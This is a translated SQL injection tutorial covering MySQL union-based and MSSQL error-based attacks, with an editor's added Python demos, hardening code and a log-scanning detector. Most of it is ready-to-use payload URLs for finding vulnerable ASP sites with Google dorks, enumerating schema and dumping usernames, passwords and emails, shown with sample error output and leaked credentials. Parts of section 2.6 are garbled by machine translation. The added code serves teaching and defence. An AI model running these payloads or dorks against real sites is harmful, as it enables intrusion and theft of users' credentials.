www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','categories')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('Username')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('Username','password')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 Username from Users))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
============================================================================================================================================================
1. SQL injection tutorial (MySQL)
######################
1.1 What is SQL injection?
1.2 Test the page for the vulnerability!
1.3 How to discover how many columns exist?
1.4 Try the UNION SELECT!
1.5 How to discover the MySQL version?
1.6 How to discover the table name (table_name)?
1.7 How to discover the column name (column_name)?
1.8 Conclusion
============================
1.1 What is SQL injection?
============================
SQL injection is one of the methods most used today to gain access to a website.
It lets the attacker carry out the attack through the URL (or any other input that ends up inside an SQL query).
With it the attacker reaches data in MySQL (usernames, passwords), various logins, the administration area of the site, and so on.
====================================
1.2 Test the page for the vulnerability!
====================================
Say we have something like this:
------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------
To test whether the page is vulnerable we simply add a single quote (') to the parameter, so that it looks like this:
------------------------------------
http://www.site.com/vesti.php?id=1'
------------------------------------
If, after this, we get an error such as:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" or "Warning: mysql_result() [function.mysql-result]"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
then the page is vulnerable: the quote broke the query, which means our input is pasted straight into the SQL text. (A site that hides its errors can still be vulnerable; the absence of an error is not proof that it is safe.)
=====================================================
1.3 How to discover how many columns exist?
=====================================================
To find that out we use: order by
"order by N--" tells us how many columns the vulnerable query selects: the database rejects any N larger than the column count. Going with the example:
-----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <-> the page opens normally, no error
-----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <-> the page opens normally, no error
-----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <-> the page opens normally, no error
-----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <-> the page opens normally, no error
-----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 5-- <-> error page, so here we have an error!
-----------------------------------------------------------------------------------------------------
This means the page's query has 4 columns: we take the last number that did not give an error.
(MySQL only treats -- as a comment when a space follows it, and browsers drop a trailing space from the URL; if more SQL follows the id in the page's query, write --+ instead, the + being a URL-encoded space.)
=======================================
1.4 Try the UNION SELECT!
=======================================
Now we make the column numbers (and later other data) appear on the page through "union select".
With 4 columns the example looks like this:
---------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
---------------------------------------------------------------
If one of the numbers 1-4 shows up on the page, everything works. If not, put a minus in front of the id, so that the original query returns no row and the page has to render ours instead; the number itself does not matter, it can be 50, 71, 9999 etc., for example:
-------------------------------------------------------------------
http://www.site.com/vesti.php?id=-50 union select 1,2,3,4--
-------------------------------------------------------------------
http://www.site.com/vesti.php?id=-71 union select 1,2,3,4--
-------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4--
-------------------------------------------------------------------
Now one of the numbers 1-4 must appear on the page.
If one of them appears, everything is OK: that number marks the column whose value the page prints, and that is where we will place our own expressions from here on.
=========================================
1.5 How to discover the MySQL version?
=========================================
Finding the version is easy: replace the column number that appeared on the page with "@@version".
Say the number shown on the page was 3; then the request looks like the example below.
--------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,@@version,4--
--------------------------------------------------------------------------
The version is now displayed on the page in place of the 3.
This matters: from version 5.x on we can list tables and columns through INFORMATION_SCHEMA, while older versions (4.x, 3.x) do not have it, and then the names have to be guessed.
=============================
1.6 How to discover the table name (table_name)?
=============================
As mentioned above, there is a small problem with older versions of MySQL (4.x, 3.x).
For this reason the steps differ depending on whether the version found above is 4.x or 5.x.
VERSION 4.x.x
On older versions (4.x, 3.x) there is no way to list table names; we have no choice but to guess them, using a little logic.
For these versions it is best to have a list of the most common tables and try them one by one.
Commonly used tables are: users, user, admin, admins, member, members, login, administrators, mysql.user, etc.
VERSION 5.x.x
If the page runs version 5.x it is easier, because we can use "INFORMATION_SCHEMA.TABLES" to list the tables and "INFORMATION_SCHEMA.COLUMNS" to list the columns.
To find the tables go as in this example:
--------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,table_name,4 from information_schema.tables--
--------------------------------------------------------------------------------------------------------
So we put table_name in place of the number that appeared on the page, and the table names are then displayed. Most pages print only the first row of the result; to step through the tables one at a time append limit 0,1, limit 1,1, limit 2,1 and so on before the --.
===============================
1.7 How to discover the column name (column_name)?
===============================
Finding the column names (column_name) works the same way as the table names!
VERSION 4.x.x
Commonly used columns are: username, user, user_name, usr, usn, pass, password, passwd, pwd, email, emailaddress, etc.
VERSION 5.x.x
Listing the column names is, as said before, the same as for the tables, except that in this case we query the columns view instead of the tables one.
Go with this example:
---------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns--
---------------------------------------------------------------------------------------------------------
Now, to pick a single table and list only its column names, go as in this example:
--------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns where table_name='users'--
--------------------------------------------------------------------------------------------------------------------------------
(The table name must be a string literal here; the original wrote it without quotes, which MySQL would read as a column reference. If the application strips quotes, a hex literal such as 0x7573657273 for 'users' does the same job.)
In this case only the column names of the table "users" appear.
Finally, say the table is users and its columns are username, password and email.
Then, to display the data from MySQL:
---------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-71 union select 1,2,concat(username,char(58),password,char(58),email),4 from users--
---------------------------------------------------------------------------------------------------------------------------
concat() = joins 2, 3 or more columns into a single value.
char(58) = the colon (:), which separates the columns in the output.
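The whole MySQL procedure of 1.2 to 1.7 replayed against a local database, as an added example by the editor, not code from the original post. SQLite stands in for MySQL so that it runs offline with nothing but Python's standard library: the order by probe, the negative id plus union select, and the version, table, column and concat-style dumps are the same moves, but SQLite's sqlite_master and pragma_table_info replace information_schema, sqlite_version() replaces @@version, and the || operator replaces concat(). The vesti and users tables and their rows are constructed for the demo, and get_news_safe shows the fix: validate the id and bind it as a parameter.

```python
"""Union-based SQL injection, sections 1.2 to 1.7, replayed offline.

Added example by the editor, not code from the original post. SQLite stands
in for MySQL (no server needed), so the metadata queries differ: MySQL's
information_schema.tables/columns become sqlite_master and pragma_table_info,
@@version becomes sqlite_version(), and concat() becomes ||. The tables and
rows below are constructed for the demo.
"""
import sqlite3


def build_db():
    """Constructed sample database: a 4-column news table (like vesti.php)
    and the users table the tutorial ends up dumping."""
    con = sqlite3.connect(":memory:")
    con.execute("create table vesti (id integer, title text, body text, author text)")
    con.execute("insert into vesti values (1, 'First post', 'Hello world', 'editor')")
    con.execute("create table users (id integer, username text, password text, email text)")
    con.execute("insert into users values (1, 'admin', '123456', 'admin@example.com')")
    return con


def get_news_vulnerable(con, news_id):
    """The bug behind vesti.php?id=...: the parameter is pasted into the SQL text."""
    sql = "select id, title, body, author from vesti where id=" + news_id
    return con.execute(sql).fetchall()


def get_news_safe(con, news_id):
    """Hardened form: the id is validated as an integer and bound as a
    parameter, so 'union select ...' can never become part of the query."""
    sql = "select id, title, body, author from vesti where id=?"
    return con.execute(sql, (int(news_id),)).fetchall()


def count_columns(con, max_columns=64):
    """Section 1.3: raise 'order by N' until the database rejects N."""
    for n in range(1, max_columns + 1):
        try:
            get_news_vulnerable(con, f"1 order by {n}--")
        except sqlite3.OperationalError:   # "ORDER BY term out of range"
            return n - 1
    return max_columns


def leak(con, expr, source=""):
    """Sections 1.4 to 1.7: a negative id empties the real result, so the page
    renders our UNION row; column 3 carries the expression we want to read."""
    rows = get_news_vulnerable(con, f"-9999 union select 1,2,{expr},4{source}--")
    return [r[2] for r in rows]


def run_injection_walkthrough():
    con = build_db()
    ncols = count_columns(con)                                                # 1.3 -> 4
    version = leak(con, "sqlite_version()")[0]                                # 1.5
    tables = set(leak(con, "name", " from sqlite_master where type='table'"))  # 1.6
    columns = set(leak(con, "name", " from pragma_table_info('users')"))      # 1.7
    creds = leak(con, "username||char(58)||password||char(58)||email", " from users")[0]
    try:
        get_news_safe(con, "-9999 union select 1,2,3,4--")
        safe_rejects_payload = False
    except ValueError:                      # rejected before it reaches the database
        safe_rejects_payload = True
    return {
        "ncols": ncols,
        "version_matches_library": version == sqlite3.sqlite_version,
        "tables": tables,
        "columns": columns,
        "creds": creds,
        "safe_rejects_payload": safe_rejects_payload,
    }


if __name__ == "__main__":
    for key, value in run_injection_walkthrough().items():
        print(f"{key}: {value}")
```

Run it as a script to see each step's result; the same union payload handed to get_news_safe raises ValueError before any SQL is executed, which is the whole difference between the two query functions.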
================
1.8 Conclusion
================
And here, as a result, all the links of this post in one place, so they can be followed easily:
==============================================================================================================================
http://www.site.com/vesti.php?id=1
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1'
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <-> the page opens normally, no error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <-> the page opens normally, no error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <-> the page opens normally, no error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <-> the page opens normally, no error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 5-- <-> error page, so here we have an error!
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,@@version,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,table_name,4 from information_schema.tables--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-82 union select 1,2,column_name,4 from information_schema.columns where table_name='users'--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-71 union select 1,2,concat(username,char(58),password,char(58),email),4 from users--
==============================================================================================================================
____________________________________________________________________________________________________________________________________
####################################################################################################################################
2. MSSQL injection, method of attack!
######################################
2.1 Introduction
2.2 How to look for vulnerable sites?
2.3 How to prove that a site is vulnerable?
2.4 How to discover the version / name of the DB?
2.5 How to discover the names of the tables (table_name)?
2.6 How to discover the names of the columns (column_name)?
2.7 How to retrieve the data that interests us (e.g. username, pass, email)?
2.8 Conclusion
[2.1 INTRODUCTION]
###############
Greetings!
In this lesson I will try to explain a technique that is already known to others: MSSQL injection.
You will get the chance to learn how this method is used, step by step, to obtain information (usernames, passwords, logins) or other data from the database.
MSSQL injection applies to products of the well-known company Microsoft: pages coded in ASP / ASPX etc. that query a Microsoft SQL Server database.
There are several kinds of attack under this method, such as:
* - Normal MSSQL SQL Injection Attack
* - MSSQL Injection in Web Services (SOAP Injection)
* - MSSQL Injection Attack with UNION
* - ODBC Error Message Attack with "convert"
* - MSSQL Blind SQL Injection Attack, etc.
This write-up uses the following one:
"ODBC Error Message Attack with convert"
[2.2 How to look for vulnerable sites?]
############################################
Looking for vulnerable pages is easy: it can be done with the services of the giant GOOGLE.
Open: www.google.com
and type, for example: inurl:".asp" "id"
inurl:"news.asp" "menu"
inurl:"content.asp" "sub"
inurl:"games.asp" "id"
ETC. (I gave only a few examples; now use your own logic to build better dorks.)
[2.3 How to prove that a site is vulnerable?]
########################################################
This is easy to see after adding a single quote (') to the id parameter of the page.
If the reply comes back with an error, the site is vulnerable. Some of the most frequent responses:
++++++++++++++++++++++++++++++++++++++
/ ODBC Microsoft Access Driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Ole DB Provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
All of them show that the quote reached the database, but not all of them mean SQL Server: "ODBC Microsoft Access Driver" and "Microsoft Ole DB Provider for Oracle" name an Access or Oracle back end, where the convert(int, ...) trick used below (SQL Server syntax) will not work. "Unclosed quotation mark" is the SQL Server message and the one to look for in this tutorial.
Now, following the example, we put the single quote (') at the end of the id.
For example:
--------------------------------------
www.localhost.com/lajmi.asp?id=100'
--------------------------------------
Say the following error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ') AND (Volgorde> 0) Order by Volgorde'.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the page is vulnerable. The message also shows the rest of the page's own query after our input, which is why every payload below ends with -- to comment that part out.
[2.4 How to discover the version / name of the DB?]
#################################################
The example makes it easiest to understand. The trick is always the same: convert(int, <string>) fails for a non-numeric string, and SQL Server puts the offending value into the error message, so whatever we select is leaked to us one value per request (this only works while the application displays database errors).
Version:
--------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--
--------------------------------------------------------------------
(The + signs are URL-encoded spaces; the id the server sees is: 100 or 1=convert(int,(@@version))--)
And we get, for example:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (VM)' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Now find the database name with db_name():
---------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(db_name()))--
---------------------------------------------------------------------
e.g.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'KHG_CREW_DB' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[2.5 How to discover the names of the tables (table_name)]
#########################################################
To find the tables of a page, ask information_schema.tables for one name at a time.
For example:
----------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------------------------------------------------
An error like this is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Users' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So in this case the first table (table_name) is 'Users'. Now find the next one by excluding it with not in:
For example:
----------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
----------------------------------------------------------------------------------------------------------------------------------------------------
The same kind of error appears and gives the second table:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'news' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
The table in this case is 'news'.
Now, to find the third table, go like this:
For example:
-------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
-------------------------------------------------------------------------------------------------------------------------------------------------------------
And it shows the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'categories' to data type int.
/msn/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
So the third table is 'categories'; continue like this until all the tables are discovered. The list ends when a request no longer produces a conversion error: with nothing left to select, top 1 returns NULL and convert(int, NULL) does not fail.
For example:
------------------------------------------------------------------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','categories')))--
------------------------------------------------------------------------------------------------------------------------------------------------------------
[2.6 How to discover names of kolumnave (column_name)]
################################################## ######
-If you want to nxjerim column_name of table 'Users' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Username' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So the name of kolumn?s first table (table_name) 'Users' is' username'
Now go find kolumn?n (column_name) for the second the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'password' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Name kolumnes (column_name) the second is' password ', now go find the next column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username ',' password ') )) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'emailaddress' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So is the third Colum_name 'emailaddress' and so forth continue until the end, so as to find you all kolumnat (column_name)!
[2.7 How to get the data we are interested in (username, pass, email, etc.)]
############################################################################
For this we need nothing but what we noted down earlier.
All that has to be done in this part is to substitute the table name (table_name) and the column names (column_name) that we found previously into their places.
For this part we will use:
Table_name = Users
Column_name = username, password, emailaddress!
Now we substitute them, for example:
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))--
----------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
username: Admin
Now replace the first column, "username", with the second column, "password":
For example:
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
----------------------------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value '123456' to data type int.
/msn/shared/includes/main_rub.asp, line 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
password: 123456
For the remaining columns, proceed in the same way as above:
For example:
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
----------------------------------------------------------------------------------------------------
emailaddress: boom3rang@live.com
With this we have obtained the information we were after, such as the username, password and emailaddress of a page:
username: Admin
password: 123456
emailaddress: boom3rang@live.com
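Added example, not part of the tutorial: a Python/sqlite stand-in for the kind of lookup page described above (the tutorial's lajmi.asp), with the pattern the tutorial relies on placed beside a hardened version. The table name, its columns and the sample rows are constructed for the demo; sqlite does not understand MSSQL's convert(int, ...) or TOP, so the probe fails with a syntax error rather than the nvarchar conversion error shown above, but the mechanism is the same: in the vulnerable handler the request text reaches the SQL parser and the driver's error text is echoed back to the client, while the hardened handler rejects a non-numeric id, binds it as a parameter and returns only an opaque error.

```python
import logging
import sqlite3

log = logging.getLogger("lajmi")


def make_db():
    """Constructed in-memory stand-in for the page's news table (sqlite, not MSSQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(100, "first story"), (101, "second story")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern the tutorial exploits: input glued into the SQL text, DB error echoed back."""
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    try:
        return {"status": 200, "rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        # Echoing the driver's message is the channel the tutorial reads values from.
        return {"status": 500, "error": str(exc)}


def lookup_hardened(conn, raw_id):
    """Same lookup with type validation, a bound parameter and an opaque error."""
    try:
        id_value = int(raw_id)   # id is numeric by contract; anything else is rejected up front
    except ValueError:
        return {"status": 400, "error": "invalid id"}
    try:
        rows = conn.execute("SELECT id, title FROM news WHERE id=?", (id_value,)).fetchall()
        return {"status": 200, "rows": rows}
    except sqlite3.Error:
        log.exception("database error for id=%r", id_value)   # detail stays server-side
        return {"status": 500, "error": "internal error"}


# Demo inputs: one legitimate id and one of the probes listed in the tutorial.
LEGIT = "100"
PROBE = "100 or 1=convert(int,(select top 1 password from Users))--"

if __name__ == "__main__":
    db = make_db()
    for raw in (LEGIT, PROBE):
        print(repr(raw), "->", lookup_vulnerable(db, raw), "|", lookup_hardened(db, raw))
```

The order of the checks in the hardened handler matters: validating the type first means the database is never asked a question built from untrusted text, and the parameter binding covers any column that has to stay a string (a title or a search term), where an int() check is not available.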
[2.8 Conclusion]
###################
And here, as a summary, I will post all the links!
====================================================================================================
www.localhost.com/lajmi.asp?id=100'
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(@@version))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(db_name()))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','categories')))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username','password')))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 username from Users))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
----------------------------------------------------------------------------------------------------
www.localhost.com/lajmi.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
====================================================================================================
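Added example, not from the tutorial: a small Python scanner a defender could run over web-server access logs to flag the request shapes listed above. The log format (a simplified W3C-style line of date, time, method, URI stem, query string and status) and the log lines themselves are constructed for the demo; real IIS logs carry more fields and a #Fields: header, so the field split would need adjusting. Each query parameter is URL-decoded and matched against indicators for the type-conversion probe, schema enumeration, row-at-a-time subselects, version and database fingerprinting, the or 1= tautology, comment termination and the initial stray quote, and a severity is derived from which of them fire.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access log, simplified W3C style:
# date time method uri-stem uri-query status. Not taken from any real server.
SAMPLE_LOG = """\
2010-07-16 10:01:02 GET /lajmi.asp id=100 200
2010-07-16 10:01:09 GET /lajmi.asp id=100' 500
2010-07-16 10:01:15 GET /lajmi.asp id=100+or+1=convert(int,(@@version))-- 500
2010-07-16 10:01:21 GET /lajmi.asp id=100+or+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2010-07-16 10:01:30 GET /lajmi.asp id=100+or+1=convert(int,(select+top+1+password+from+Users))-- 500
2010-07-16 10:02:00 GET /search.asp q=converting+files+to+int 200
2010-07-16 10:02:05 GET /lajmi.asp id=101&page=2 200
"""

# Indicators matched against each decoded, lower-cased parameter value.
INDICATORS = [
    ("type_conversion_probe", re.compile(r"\bconvert\s*\(\s*int\b")),   # convert(int, ...) error channel
    ("schema_enumeration",    re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("subselect_top",         re.compile(r"\bselect\s+top\s+\d+\b")),   # row-at-a-time extraction
    ("fingerprint",           re.compile(r"@@version|\bdb_name\s*\(")),
    ("tautology_or",          re.compile(r"\bor\s+1\s*=")),
    ("comment_termination",   re.compile(r"--\s*$")),
    ("stray_quote",           re.compile(r"^\d+'")),                    # the initial id=100' probe
]
HIGH = {"type_conversion_probe", "schema_enumeration", "subselect_top"}
MEDIUM = {"fingerprint", "tautology_or", "comment_termination"}


def analyze_query(query: str) -> dict:
    """Return {parameter: [indicator tags]} for every parameter that matches at least one indicator."""
    hits = {}
    # parse_qsl splits on '&', then on the first '=' only, and decodes '+' as a space,
    # so 'id=100+or+1=convert(...)' becomes ('id', '100 or 1=convert(...)').
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = value.lower()
        tags = [tag for tag, rx in INDICATORS if rx.search(value)]
        if tags:
            hits[name] = tags
    return hits


def severity(hits: dict) -> str:
    """Collapse the matched tags into high / medium / low / none."""
    tags = {t for tag_list in hits.values() for t in tag_list}
    if tags & HIGH:
        return "high"
    if tags & MEDIUM:
        return "medium"
    return "low" if tags else "none"


def scan_log(log_text: str) -> list:
    """Return one finding per log line whose query string matches an indicator."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue   # malformed line; a real parser would follow the #Fields: header
        date, time, method, stem, query, status = parts[:6]
        hits = analyze_query(query)
        if hits:
            findings.append({
                "time": f"{date} {time}",
                "method": method,
                "stem": stem,
                "status": int(status),
                "hits": hits,
                "severity": severity(hits),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["severity"], f["stem"], f["hits"])
```

The benign search query containing the word "converting" is included on purpose: matching on decoded parameter values with word boundaries and the opening parenthesis keeps it out of the findings, whereas a bare substring match on "convert" would flag it. A run of these findings against one client within a minute, with 500 responses on each, is the sequence the tutorial walks through and is worth an alert on its own.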
Hello World (Classic Title :)
Hello friends, I will try to give you information here. Here goes, good luck :B